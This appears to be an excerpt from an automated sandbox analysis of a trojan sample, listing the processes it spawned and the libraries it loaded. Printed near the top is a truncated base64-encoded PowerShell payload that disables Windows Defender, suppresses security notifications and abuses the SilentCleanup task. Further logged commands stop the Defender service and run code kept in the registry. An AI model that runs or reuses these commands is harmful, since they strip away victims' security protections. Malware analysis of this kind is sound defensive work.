Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe	Section loaded: cryptsp.dll
